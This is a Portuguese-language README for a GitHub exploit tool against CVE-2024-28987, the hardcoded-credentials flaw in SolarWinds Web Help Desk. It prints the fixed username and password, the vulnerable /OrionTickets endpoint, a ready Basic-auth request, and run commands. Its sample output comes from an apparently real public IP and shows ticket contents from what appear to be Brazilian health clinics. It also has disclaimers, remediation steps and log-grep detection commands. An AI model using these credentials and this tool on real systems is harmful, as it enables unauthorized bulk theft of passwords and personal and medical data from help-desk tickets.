
CVE-2024-28987 — Updated!
**CVE-2024-28987** é uma vulnerabilidade crítica no SolarWinds Web Help Desk (WHD) que permite que atacantes remotos acessem informações sensíveis de chamados usando **credenciais hardcoded**. Esta vulnerabilidade possui uma **pontuação CVSS de 9.1 (Crítica)** e está sendo ativamente explorada na natureza.
CVE-2024-28987 - Exploração de Credenciais Fixas no SolarWinds Web Help Desk
⚠️ AVISO: Esta ferramenta é exclusivamente para fins educacionais e de testes de segurança autorizados. O acesso não autorizado a sistemas de computador é ilegal. Use esta ferramenta somente em sistemas que você possua ou para os quais tenha permissão explícita de teste.
📋 Visão Geral
CVE-2024-28987 é uma vulnerabilidade crítica no SolarWinds Web Help Desk (WHD) que permite a atacantes remotos acessar informações sensíveis de chamados usando credenciais fixas (hardcoded). Esta vulnerabilidade possui pontuação CVSS de 9.1 (Crítica) e está sendo ativamente explorada no mundo real.
Detalhes da Vulnerabilidade
| Atributo | Valor |
|---|---|
| CVE ID | CVE-2024-28987 |
| Pontuação CVSS | 9.1 (Crítica) |
| CWE | CWE-798 (Credenciais Fixas) |
| Produtos Afetados | SolarWinds Web Help Desk ≤ 12.8.3 Hotfix 1 |
| Versão Corrigida | 12.8.3 Hotfix 2 |
| Exploração | Ativamente explorada no mundo real |
| Adicionada à CISA KEV | 15 de outubro de 2024 |
Impacto
Um atacante não autenticado pode:
- Acessar todos os chamados de suporte contendo informações sensíveis
- Visualizar senhas temporárias, solicitações de redefinição e credenciais de serviços compartilhados
- Executar operações CRUD em chamados por meio do endpoint
/OrionTickets - Potencialmente pivotar para outros sistemas na rede
🔧 Recursos
- ✅ Detecção automática de vulnerabilidade - Testa credenciais fixas
- ✅ Extração de chamados - Recupera todos os chamados de sistemas vulneráveis
- ✅ Varredura de dados sensíveis - Identifica senhas, credenciais, PII e dados médicos
- ✅ Múltiplos formatos de saída - JSON e JSONL para grandes conjuntos de dados
- ✅ Pré-visualização interativa - Mostra os primeiros 3 chamados antes da extração
- ✅ Zero dependências - Usa apenas a biblioteca padrão do Python
- ✅ Saída colorida - Legibilidade aprimorada com cores ANSI
- ✅ Tratamento de erros - Tratamento adequado de erros de conexão
🚀 Início Rápido
Pré-requisitos
- Python 3.6 ou superior
- Nenhuma dependência externa necessária!
Instalação
# Clone the repository
git clone https://github.com/Darabium/CVE-2024-28987.git
cd CVE-2024-28987
# Make the script executable
Usage
bash
# With target URL as argument
python3 cve-2024-28987.py http://target-ip:port
# Interactive mode (will prompt for target)
python3 cve-2024-28987.py
# Example with a vulnerable target
python3 cve-2024-28987.py http://192.168.1.100:8098
📊 Output Example
bash
$ python3 cve-2024-28987.py http://138.94.193.65:8098
╔══════════════════════════════════════════════════════════════════╗
║ ║
║ ██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██╗ ██╗███████╗ ║
║ ██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗██║ ██║██╔════╝ ║
║ ██║ ██║ ██║█████╗ █████╔╝██║██╔██║███████║█████╗ ║
║ ██║ ╚██╗ ██╔╝██╔══╝ ██╔═══╝ ████╔╝██║██╔══██║██╔══╝ ║
║ ╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝██║ ██║███████╗ ║
║ ╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝ ║
║ ║
║ CVE-2024-28987 - SolarWinds Web Help Desk ║
║ Hardcoded Credentials Vulnerability ║
║ ║
╠══════════════════════════════════════════════════════════════════╣
║ GitHub: https://github.com/Darabium ║
╚══════════════════════════════════════════════════════════════════╝
[*] Checking http://****:**/helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/
[+] Target is VULNERABLE!
[+] Found 42 tickets
======================================================================
[📋] Ticket Preview (First 3 tickets)
======================================================================
Ticket #1
├── ID: 5690
├── Client: UBS Portao Vermelho
├── Status: Open
├── Detail: BOA TARDE ENCAMINHO SOLICITAÇÃO DE MATERIAIS DA ODONTO
Ticket #2
├── ID: 5691
├── Client: UBS Centro
├── Status: In Progress
├── Detail: ALCOOL 70% - Solicitação de material de limpeza
======================================================================
[🔐] Scanning for Sensitive Data
======================================================================
[!] Potential PASSWORD data found in ticket #5723
└── detail: Please reset my password for system access...
[?] Do you want to extract ALL tickets to file? [y/N]: y
[*] Saving to: 138_94_193_65_8098_tickets.json
[✓] Successfully saved 138_94_193_65_8098_tickets.json
[*] File size: 42,847 bytes
[*] Total tickets: 42
[*] Done!
GitHub: https://github.com/Darabium
📁 Estrutura de Arquivos
CVE-2024-28987/
├── cve-2024-28987.py # Script de exploração principal
├── README.md # Este arquivo
└── LICENSE # Licença MIT
Arquivos de Saída
Quando você extrai chamados, os seguintes arquivos são criados:
Formato JSON padrão (sempre criado)
138_94_193_65_8098_tickets.json
Formato JSONL (criado se houver mais de 100 chamados)
***_tickets.jsonl
🔍 Detalhes Técnicos
Credenciais Fixas
USERNAME = "helpdeskIntegrationUser"
PASSWORD = "dev-C4F8025E7"
Endpoint Afetado
/helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/
Exemplo de Requisição HTTP
GET /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ HTTP/1.1
Host: vulnerable-target:8098
Authorization: Basic aGVscGRlc2tJbnRlZ3JhdGlvblVzZXI6ZGV2LUM0ZjgwMjVFNw==
Content-Type: application/x-www-form-urlencoded
🛡️ Remediação
Ações Imediatas
- Atualize imediatamente para o SolarWinds Web Help Desk versão 12.8.3 Hotfix 2 ou posterior
- Verifique os logs em busca de acessos suspeitos ao endpoint /OrionTickets
- Monitore acessos não autorizados aos dados de chamados
- Redefina todas as credenciais que possam ter sido expostas nos chamados
- Revise todos os chamados de suporte em busca de possíveis vazamentos de dados
Comandos de Detecção
# Check for exploitation attempts in logs
grep -i "OrionTickets" /var/log/webhelpdesk/access.log
# Check for unauthorized access patterns
grep -i "helpdeskIntegrationUser" /var/log/webhelpdesk/access.log
# Check current version
cat /opt/WebHelpDesk/version.txt
🚨 Aviso da CISA KEV
Esta vulnerabilidade foi adicionada ao catálogo de Vulnerabilidades Exploradas Conhecidas (KEV) da CISA. As organizações são obrigadas a aplicar a correção até o prazo especificado.
Data de Adição: 15 de outubro de 2024
Ação Necessária: Aplicar atualizações conforme as instruções do fornecedor
Prazo Final: 5 de novembro de 2024 (21 dias)
📚 Referências
NVD CVE-2024-28987
Catálogo KEV da CISA
Aviso de Segurança da SolarWinds
PEP 668 - Gerenciamento de Ambiente Externo
🤝 Contribuindo
Contribuições são bem-vindas! Sinta-se à vontade para enviar pull requests ou abrir issues.
Diretrizes
- Faça um fork do repositório
- Crie sua branch de funcionalidade (git checkout -b feature/AmazingFeature)
- Faça commit das suas alterações (git commit -m 'Add some AmazingFeature')
- Envie para a branch (git push origin feature/AmazingFeature)
- Abra um Pull Request
📝 Licença
Este projeto está licenciado sob a Licença MIT - consulte o arquivo LICENSE para obter detalhes.
⚡ Autor
Darabium - Trabalho inicial - GitHub
⚠️ Notas Importantes
- Esta ferramenta destina-se à pesquisa de segurança e a fins educacionais
- Não use em sistemas que você não possui ou sem permissão explícita para testar
- O autor não é responsável por qualquer uso indevido desta ferramenta
- Sempre siga práticas de divulgação responsável
- Respeite as leis de privacidade e proteção de dados em sua jurisdição
🌟 Histórico de Estrelas
Se você achar esta ferramenta útil, por favor, dê uma ⭐ no GitHub!
📞 Suporte
- Abra uma issue no GitHub para relatar bugs
- Para questões de segurança, entre em contato diretamente pelo GitHub
Feito com ❤️ para o Darabium